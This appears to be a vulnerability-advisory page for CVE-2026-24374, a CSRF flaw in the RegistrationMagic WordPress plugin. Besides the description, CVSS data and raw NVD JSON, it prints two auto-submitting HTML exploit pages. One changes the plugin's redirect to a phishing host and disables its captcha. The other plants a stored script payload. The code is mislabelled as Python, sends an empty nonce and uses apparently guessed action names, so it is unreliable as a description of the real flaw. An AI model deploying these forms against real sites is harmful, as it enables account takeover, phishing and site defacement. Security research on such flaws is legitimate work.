Security Vulnerability Report
中文
CVE-2026-24374 CVSS 5.4 MEDIUM

CVE-2026-24374

Published: 2026-01-22 17:16:41
Last Modified: 2026-04-28 15:16:08

Description

Cross-Site Request Forgery (CSRF) vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Cross Site Request Forgery.This issue affects RegistrationMagic: from n/a through <= 6.0.6.9.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

RegistrationMagic (WordPress插件) <= 6.0.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2026-24374 CSRF PoC for RegistrationMagic Plugin --> <!-- This PoC demonstrates CSRF attack on RegistrationMagic <= 6.0.6.9 --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - RegistrationMagic</title> </head> <body> <h1>CSRF Attack PoC for CVE-2026-24374</h1> <p>Malicious page that tricks admin into modifying plugin settings</p> <!-- Form to modify RegistrationMagic settings --> <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="rm_form_submission" /> <input type="hidden" name="form_id" value="1" /> <input type="hidden" name="rm_action" value="update_settings" /> <input type="hidden" name="rm_settings[redirect_url]" value="http://malicious-site.com/phishing" /> <input type="hidden" name="rm_settings[enable_captcha]" value="0" /> <input type="hidden" name="_wpnonce" value="" /> </form> <!-- Auto-submit form without user interaction --> <script> document.getElementById('csrfForm').submit(); // Attack succeeds if victim is logged in as admin // Browser automatically includes session cookies </script> <p>If you see this message, the attack failed or was already executed.</p> </body> </html> <!-- Alternative: Stored XSS + CSRF combined attack --> <!-- This PoC demonstrates modifying form settings to inject malicious content --> <!DOCTYPE html> <html> <body> <form id="maliciousForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="rm_form_editor_save" /> <input type="hidden" name="form_id" value="1" /> <input type="hidden" name="form_data[form_name]" value="Malicious Registration Form" /> <input type="hidden" name="form_data[form_html]" value="<script>alert('XSS')</script>" /> <input type="hidden" name="_wpnonce" value="" /> </form> <script>document.getElementById('maliciousForm').submit();</script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24374", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:40.547", "lastModified": "2026-04-28T15:16:07.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Cross Site Request Forgery.This issue affects RegistrationMagic: from n/a through <= 6.0.6.9."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager permite la falsificación de petición en sitios cruzados. Este problema afecta a RegistrationMagic: desde n/a hasta &lt;= 6.0.6.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/custom-registration-form-builder-with-submission-manager/vulnerability/wordpress-registrationmagic-plugin-6-0-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}